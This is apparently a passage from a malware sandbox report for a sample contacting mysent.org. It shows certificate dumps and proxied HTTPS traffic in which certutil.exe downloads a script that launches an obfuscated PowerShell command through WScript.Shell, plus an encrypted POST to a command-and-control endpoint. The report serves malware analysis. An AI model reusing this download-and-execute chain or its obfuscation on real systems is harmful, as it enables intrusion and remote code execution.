ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: mysent.org][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 5A 89 04 CE 12 04 DE C7 1A B6 37 7E 0B 52 41 EA Z.........7..RA.0010: D0 D3 87 A7 ....]]] Algorithm: [SHA1withRSA] Signature:0000: 34 C7 4A 88 4C 24 5D 55 3C 06 A7 18 76 FB B2 E6 4.J.L$]U<...v...0010: 3E 18 40 EE 23 26 4B 75 33 21 CD 5C EA 0D 57 47 >.@.#&Ku3!.\..WG0020: D5 14 4B 4F BE 04 73 8C D1 5A 70 3E D6 D1 D5 FD ..KO..s..Zp>....0030: 7E ED 32 14 2E 21 36 23 DF 41 79 06 64 A4 2F 1D ..2..!6#.Ay.d./.0040: 41 0F A1 42 18 B2 74 26 70 BF 4B 6C F4 B8 B9 24 A..B..t&p.Kl...$0050: 7E 8C FB 80 08 19 3F EF 07 0C A9 CF 35 86 47 63 ......?.....5.Gc0060: DB EB 11 8B 31 72 D9 6F 28 59 62 A5 B1 CB B5 9D ....1r.o(Yb.....0070: 11 DB 34 1F A9 25 DB 9F 6F 3E 84 A7 4E 12 C7 CF ..4..%..o>..N...0080: 57 B4 D2 AB B1 58 98 7A 35 9C 4C 20 94 ED 9D 42 W....X.z5.L ...B0090: D9 DE DD FA BE 7E 65 C7 F1 69 A4 27 AE 0F 77 87 ......e..i.'..w.00A0: C1 77 D5 87 A3 49 02 D0 B2 C8 99 80 FB 58 5C 21 .w...I.......X\!00B0: 68 2A 01 7A 8D D5 70 AD 90 4D 98 EC C4 08 EF 5A h.z..p..M.....Z00C0: 96 4B 4D 43 D9 2E 76 9D 57 9B B0 E2 ED 28 50 D2 .KMC..v.W....(P.00D0: 67 42 3F FA 4C D0 AF BD 3F 27 BB C0 37 8A 9C 05 gB?.L...?'..7...00E0: 92 E9 9C F7 FE ED 52 AE 1A CA 53 32 8E BC 12 97 ......R...S2....00F0: 98 AC 6F 63 EC 09 0C 28 3D 83 CB 76 D7 92 85 30 ..oc...(=..v...00100: B0 F8 36 E7 0D 31 CC F1 E7 F2 6C 8F EE 8D F7 A0 ..6..1....l.....0110: 49 C4 83 1B 7A 27 B2 DC 32 3C B1 8F 66 BC BB 4F I...z'..2<..f..O0120: 35 3A 65 7D CE FD C6 95 5B A0 B9 63 41 3C 84 6E 5:e.....[..cA<.n0130: 59 6D A4 D3 E0 EF C1 77 F8 4A BA CA DF 65 BD FE Ym.....w.J...e..0140: C5 2A 1D 69 38 94 02 D6 B5 74 B6 3C 5F 7B 24 30 ..i8....t.<_.$00150: 2F B9 35 83 DC C8 27 52 7A DC 47 C0 01 97 BE 33 /.5...'Rz.G....30160: 60 F6 F4 3C 1D 61 49 D8 70 D3 01 2B 36 16 7B C3 `..<.aI.p..+6...0170: F1 B1 29 A8 AF 44 5A C2 B5 34 B1 20 E7 45 DE EC ..)..DZ..4. .E..0180: 0B 92 70 CE F0 A0 3B 96 C4 D7 A7 4A 81 13 FA 51 ..p...;....J...Q0190: 97 DC 7F B7 5C 4F 38 89 2A CB EF 71 64 29 23 D8 ....\O8.*..qd)#.01A0: 68 FC 51 11 A8 95 3B 00 60 96 70 D0 37 57 EC 3D h.Q...;.`.p.7W.=01B0: 00 48 14 96 DC 1B BF 59 7D 79 C0 27 38 35 FA F1 .H.....Y.y.'85..01C0: D3 2D 08 6F 24 3E F6 1E 7B C1 83 88 64 42 80 0F .-.o$>......dB..01D0: 43 EE 26 1E A5 3C A6 38 07 EA 0C 04 0D 82 A1 72 C.&..<.8.......r01E0: F3 2F DF EA D5 4D BB 82 0A FE 10 88 24 DA 86 6A ./...M......$..j01F0: 4D 0F A0 E0 BF E4 11 DC C1 8B C4 18 1A 10 88 AE M...............]
Jun 19, 2018 13:47:13.360089064 MESZ	443	49242	188.241.39.220	192.168.1.81	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
Jun 19, 2018 13:47:13.397366047 MESZ	443	49243	188.241.39.220	192.168.1.81	CN=mysent.org	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Mon Jun 18 13:45:26 CEST 2018	Tue Jun 18 13:45:26 CEST 2019	[[ Version: V3 Subject: CN=mysent.org Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 142020255779474466437467796904587070192603484135849864218396671432172669171382101147506485794532471675983194620816678789045464137277686040346151440959121771884847900060007644867320878394553783339343758343135223291298085891647948350326926758635437768025453782370586416571958435585772964422012691370552485683107 public exponent: 3 Validity: [From: Mon Jun 18 13:45:26 CEST 2018, To: Tue Jun 18 13:45:26 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 6d600d30 8e6e07f7 682b6b12 4c42ab40]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: mysent.org][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 5A 89 04 CE 12 04 DE C7 1A B6 37 7E 0B 52 41 EA Z.........7..RA.0010: D0 D3 87 A7 ....]]] Algorithm: [SHA1withRSA] Signature:0000: 34 C7 4A 88 4C 24 5D 55 3C 06 A7 18 76 FB B2 E6 4.J.L$]U<...v...0010: 3E 18 40 EE 23 26 4B 75 33 21 CD 5C EA 0D 57 47 >.@.#&Ku3!.\..WG0020: D5 14 4B 4F BE 04 73 8C D1 5A 70 3E D6 D1 D5 FD ..KO..s..Zp>....0030: 7E ED 32 14 2E 21 36 23 DF 41 79 06 64 A4 2F 1D ..2..!6#.Ay.d./.0040: 41 0F A1 42 18 B2 74 26 70 BF 4B 6C F4 B8 B9 24 A..B..t&p.Kl...$0050: 7E 8C FB 80 08 19 3F EF 07 0C A9 CF 35 86 47 63 ......?.....5.Gc0060: DB EB 11 8B 31 72 D9 6F 28 59 62 A5 B1 CB B5 9D ....1r.o(Yb.....0070: 11 DB 34 1F A9 25 DB 9F 6F 3E 84 A7 4E 12 C7 CF ..4..%..o>..N...0080: 57 B4 D2 AB B1 58 98 7A 35 9C 4C 20 94 ED 9D 42 W....X.z5.L ...B0090: D9 DE DD FA BE 7E 65 C7 F1 69 A4 27 AE 0F 77 87 ......e..i.'..w.00A0: C1 77 D5 87 A3 49 02 D0 B2 C8 99 80 FB 58 5C 21 .w...I.......X\!00B0: 68 2A 01 7A 8D D5 70 AD 90 4D 98 EC C4 08 EF 5A h.z..p..M.....Z00C0: 96 4B 4D 43 D9 2E 76 9D 57 9B B0 E2 ED 28 50 D2 .KMC..v.W....(P.00D0: 67 42 3F FA 4C D0 AF BD 3F 27 BB C0 37 8A 9C 05 gB?.L...?'..7...00E0: 92 E9 9C F7 FE ED 52 AE 1A CA 53 32 8E BC 12 97 ......R...S2....00F0: 98 AC 6F 63 EC 09 0C 28 3D 83 CB 76 D7 92 85 30 ..oc...(=..v...00100: B0 F8 36 E7 0D 31 CC F1 E7 F2 6C 8F EE 8D F7 A0 ..6..1....l.....0110: 49 C4 83 1B 7A 27 B2 DC 32 3C B1 8F 66 BC BB 4F I...z'..2<..f..O0120: 35 3A 65 7D CE FD C6 95 5B A0 B9 63 41 3C 84 6E 5:e.....[..cA<.n0130: 59 6D A4 D3 E0 EF C1 77 F8 4A BA CA DF 65 BD FE Ym.....w.J...e..0140: C5 2A 1D 69 38 94 02 D6 B5 74 B6 3C 5F 7B 24 30 ..i8....t.<_.$00150: 2F B9 35 83 DC C8 27 52 7A DC 47 C0 01 97 BE 33 /.5...'Rz.G....30160: 60 F6 F4 3C 1D 61 49 D8 70 D3 01 2B 36 16 7B C3 `..<.aI.p..+6...0170: F1 B1 29 A8 AF 44 5A C2 B5 34 B1 20 E7 45 DE EC ..)..DZ..4. .E..0180: 0B 92 70 CE F0 A0 3B 96 C4 D7 A7 4A 81 13 FA 51 ..p...;....J...Q0190: 97 DC 7F B7 5C 4F 38 89 2A CB EF 71 64 29 23 D8 ....\O8.*..qd)#.01A0: 68 FC 51 11 A8 95 3B 00 60 96 70 D0 37 57 EC 3D h.Q...;.`.p.7W.=01B0: 00 48 14 96 DC 1B BF 59 7D 79 C0 27 38 35 FA F1 .H.....Y.y.'85..01C0: D3 2D 08 6F 24 3E F6 1E 7B C1 83 88 64 42 80 0F .-.o$>......dB..01D0: 43 EE 26 1E A5 3C A6 38 07 EA 0C 04 0D 82 A1 72 C.&..<.8.......r01E0: F3 2F DF EA D5 4D BB 82 0A FE 10 88 24 DA 86 6A ./...M......$..j01F0: 4D 0F A0 E0 BF E4 11 DC C1 8B C4 18 1A 10 88 AE M...............]
Jun 19, 2018 13:47:13.397366047 MESZ	443	49243	188.241.39.220	192.168.1.81	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.81	49162	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	Direction	Data
2018-06-19 11:45:27 UTC	OUT	GET /access.log.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: mysent.org
2018-06-19 11:45:27 UTC	IN	HTTP/1.1 200 OK Last-Modified: Mon, 14 May 2018 12:44:21 GMT Content-Type: text/plain Content-Length: 5376 Date: Tue, 19 Jun 2018 11:45:27 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:45:27 UTC	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 61 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 3b 0a 61 2e 72 75 6e 28 27 43 4d 44 2e 45 78 45 20 20 20 2f 43 20 20 22 73 65 74 20 20 20 4b 6a 56 3d 20 20 53 65 54 2d 56 61 72 49 41 42 6c 45 20 65 69 50 20 28 20 5b 74 59 50 65 5d 28 22 7b 37 7d 7b 35 7d 7b 31 7d 7b 31 31 7d 7b 30 7d 7b 33 7d 7b 32 7d 7b 36 7d 7b 38 7d 7b 34 7d 7b 31 30 7d 7b 39 7d 7b 31 32 7d 22 20 2d 46 20 5c 27 44 5c 27 2c 5c 27 74 69 6f 4e 5c 27 2c 5c 27 6f 6e 41 72 59 5c 27 2c 5c 27 69 63 74 69 5c 27 2c 5c 27 74 45 5c 27 2c 5c 27 4c 6c 45 43 5c 27 2c 5c 27 5b 53 54 5c 27 2c 5c 27 63 4f 5c 27 2c 5c 27 52 69 6e 47 2c 53 59 53 5c 27 2c 5c 27 4f 42 4a 5c 27 2c 5c 27 4d 2e 5c 27 2c 5c 27 53 2e 47 65 6e Data Ascii: <script>a=new ActiveXObject("WScript.Shell");a.run('CMD.ExE /C "set KjV= SeT-VarIABlE eiP ( [tYPe]("{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}" -F \'D\',\'tioN\',\'onArY\',\'icti\',\'tE\',\'LlEC\',\'[ST\',\'cO\',\'RinG,SYS\',\'OBJ\',\'M.\',\'S.Gen

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.1.81	49163	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:45:28 UTC	5	OUT	GET /access.log.txt HTTP/1.1 Accept: / User-Agent: CertUtil URL Agent Host: mysent.org Cache-Control: no-cache
2018-06-19 11:45:28 UTC	5	IN	HTTP/1.1 200 OK Last-Modified: Mon, 14 May 2018 12:44:21 GMT Content-Type: text/plain Content-Length: 5376 Date: Tue, 19 Jun 2018 11:45:28 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:45:28 UTC	6	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 61 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 3b 0a 61 2e 72 75 6e 28 27 43 4d 44 2e 45 78 45 20 20 20 2f 43 20 20 22 73 65 74 20 20 20 4b 6a 56 3d 20 20 53 65 54 2d 56 61 72 49 41 42 6c 45 20 65 69 50 20 28 20 5b 74 59 50 65 5d 28 22 7b 37 7d 7b 35 7d 7b 31 7d 7b 31 31 7d 7b 30 7d 7b 33 7d 7b 32 7d 7b 36 7d 7b 38 7d 7b 34 7d 7b 31 30 7d 7b 39 7d 7b 31 32 7d 22 20 2d 46 20 5c 27 44 5c 27 2c 5c 27 74 69 6f 4e 5c 27 2c 5c 27 6f 6e 41 72 59 5c 27 2c 5c 27 69 63 74 69 5c 27 2c 5c 27 74 45 5c 27 2c 5c 27 4c 6c 45 43 5c 27 2c 5c 27 5b 53 54 5c 27 2c 5c 27 63 4f 5c 27 2c 5c 27 52 69 6e 47 2c 53 59 53 5c 27 2c 5c 27 4f 42 4a 5c 27 2c 5c 27 4d 2e 5c 27 2c 5c 27 53 2e 47 65 6e Data Ascii: <script>a=new ActiveXObject("WScript.Shell");a.run('CMD.ExE /C "set KjV= SeT-VarIABlE eiP ( [tYPe]("{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}" -F \'D\',\'tioN\',\'onArY\',\'icti\',\'tE\',\'LlEC\',\'[ST\',\'cO\',\'RinG,SYS\',\'OBJ\',\'M.\',\'S.Gen

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.1.81	49204	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:46:39 UTC	81	OUT	POST /modules/main.php HTTP/1.1 User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org Content-Length: 238
2018-06-19 11:46:39 UTC	81	OUT	Data Raw: 64 Data Ascii: d
2018-06-19 11:46:39 UTC	81	OUT	Data Raw: 21 c2 7b 97 d9 1d a7 30 53 ea c2 7c c4 1e 9a 40 0c a5 f2 94 44 e6 5d 10 0e 5f 14 15 ab 46 2b d9 7a 7f 76 e9 c7 ac 98 a9 73 30 cf b6 34 96 26 1e e1 ac 06 c5 6b 1f 0c 57 80 67 8e e3 31 d4 fa ea 05 b2 e5 5d ab 74 95 e9 05 d7 f1 c8 f9 66 c5 a4 de 4c c0 13 6f 5e 3a 00 76 93 15 8c 21 f1 40 6a 3f 6d 08 99 da e6 ef b8 ee e5 c6 17 00 95 a0 57 eb b2 42 85 98 22 3f 81 08 0c d4 93 61 bf b6 aa b0 c7 7e 0f a4 46 e7 af 9a e8 e1 dc 52 3f e1 28 31 db fc cf d0 68 b1 1e 67 fe aa 58 6e d4 76 c3 5f 52 e6 c2 f9 07 c6 97 f9 eb cf 94 bf 7e 7f 9e f3 09 88 a5 49 3d ae 52 dd 6a 39 7b d5 8a 1f 70 1a bf 7e 4e 7f 48 33 4c 7a 98 55 be 7e 86 bf f7 ae 2e 75 43 a1 7a db 1b 2d 66 f7 f3 3a 29 07 8e df 07 47 d9 d7 ea cb 77 1d 74 9c 65 de Data Ascii: !{0S\|@D]_F+zvs04&kWg1]tfLo^:v!@j?mWB"?a~FR?(1hgXnv_R~I=Rj9{p~NH3LzU~.uCz-f:)Gwte

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.1.81	49216	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:46:48 UTC	81	OUT	GET /access.log.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: mysent.org
2018-06-19 11:46:48 UTC	81	IN	HTTP/1.1 200 OK Last-Modified: Mon, 14 May 2018 12:44:21 GMT Content-Type: text/plain Content-Length: 5376 Date: Tue, 19 Jun 2018 11:46:48 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:46:48 UTC	82	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 61 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 3b 0a 61 2e 72 75 6e 28 27 43 4d 44 2e 45 78 45 20 20 20 2f 43 20 20 22 73 65 74 20 20 20 4b 6a 56 3d 20 20 53 65 54 2d 56 61 72 49 41 42 6c 45 20 65 69 50 20 28 20 5b 74 59 50 65 5d 28 22 7b 37 7d 7b 35 7d 7b 31 7d 7b 31 31 7d 7b 30 7d 7b 33 7d 7b 32 7d 7b 36 7d 7b 38 7d 7b 34 7d 7b 31 30 7d 7b 39 7d 7b 31 32 7d 22 20 2d 46 20 5c 27 44 5c 27 2c 5c 27 74 69 6f 4e 5c 27 2c 5c 27 6f 6e 41 72 59 5c 27 2c 5c 27 69 63 74 69 5c 27 2c 5c 27 74 45 5c 27 2c 5c 27 4c 6c 45 43 5c 27 2c 5c 27 5b 53 54 5c 27 2c 5c 27 63 4f 5c 27 2c 5c 27 52 69 6e 47 2c 53 59 53 5c 27 2c 5c 27 4f 42 4a 5c 27 2c 5c 27 4d 2e 5c 27 2c 5c 27 53 2e 47 65 6e Data Ascii: <script>a=new ActiveXObject("WScript.Shell");a.run('CMD.ExE /C "set KjV= SeT-VarIABlE eiP ( [tYPe]("{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}" -F \'D\',\'tioN\',\'onArY\',\'icti\',\'tE\',\'LlEC\',\'[ST\',\'cO\',\'RinG,SYS\',\'OBJ\',\'M.\',\'S.Gen

